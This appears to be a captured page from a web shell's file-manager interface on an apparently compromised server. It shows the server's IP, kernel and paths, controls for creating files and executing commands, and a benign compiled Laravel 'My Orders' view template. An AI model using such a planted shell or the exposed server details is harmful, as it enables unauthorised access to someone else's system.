⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.162
Server IP:
147.93.29.146
Server:
Linux server.tagooz.co 5.14.0-503.15.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Nov 28 07:25:19 EST 2024 x86_64
Server Software:
Apache
PHP Version:
8.2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
webstoremaker
/
www
/
storage
/
framework
/
views
/
View File Name :
c130115ea267ec66594286255a50f462fc774bc7.php
<?php $__env->startSection('tab-title'); ?> <?php echo e($keywords['myOrders'] ?? __('My Orders')); ?> <?php $__env->stopSection(); ?> <?php $__env->startSection('page-name'); ?> <?php echo e($keywords['myOrders'] ?? __('myOrders')); ?> <?php $__env->stopSection(); ?> <?php $__env->startSection('br-name'); ?> <?php echo e($keywords['myOrders'] ?? __('myOrders')); ?> <?php $__env->stopSection(); ?> <?php $__env->startSection('content'); ?> <section class="user-dashbord pt-100 pb-60"> <div class="container"> <div class="row"> <?php if ($__env->exists('user-front.customer.side-navbar')) echo $__env->make('user-front.customer.side-navbar', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?> <div class="col-lg-9"> <div class="row"> <div class="col-lg-12"> <div class="user-profile-details mb-40"> <div class="account-info"> <div class="title mb-2"> <h4><?php echo e($keywords['myOrders'] ?? __('My Orders')); ?></h4> </div> <div class="main-info"> <div class="main-table"> <div class="table-responsive"> <table id="order_table" class="dataTables_wrapper table-striped dt-bootstrap4" style="width:100%"> <thead> <tr> <th><?php echo e($keywords['order_number'] ?? __('order number')); ?></th> <th><?php echo e($keywords['date'] ?? __('date')); ?></th> <th><?php echo e($keywords['total'] ?? __('total')); ?></th> <th><?php echo e($keywords['Status'] ?? __('status')); ?></th> <th><?php echo e($keywords['action'] ?? __('action')); ?></th> </tr> </thead> <tbody> <?php if($orders): ?> <?php $__currentLoopData = $orders; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $order): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <tr> <td><?php echo e($order->order_number); ?></td> <td><?php echo e($order->created_at->format('d-m-Y')); ?></td> <td><?php echo e($userBs->base_currency_symbol_position == 'left' ? $userBs->base_currency_symbol : ''); ?> <?php echo e($order->total); ?> <?php echo e($userBs->base_currency_symbol_position == 'right' ? $userBs->base_currency_symbol : ''); ?> </td> <td> <span class="front-status-btn <?php echo e($order->order_status); ?>"><?php echo e($order->order_status); ?></span> </td> <td> <a href="<?php echo e(route('customer.orders-details', ['id' => $order->id, getParam()])); ?>" class="btn base-bg"><?php echo e($keywords['details'] ?? __('Details')); ?></a> </td> </tr> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> <?php else: ?> <tr class="text-center"> <td colspan="4"> <?php echo e($keywords['no_items'] ?? __('No Items found!')); ?> </td> </tr> <?php endif; ?> </tbody> </table> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </section> <?php $__env->stopSection(); ?> <?php $__env->startSection('scripts'); ?> <script> $(document).ready(function() { $('#order_table').DataTable({ ordering: false }); }); </script> <?php $__env->stopSection(); ?> <?php echo $__env->make('user-front.layout', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /home/webstoremaker/public_html/resources/views/user-front/customer/order.blade.php ENDPATH**/ ?>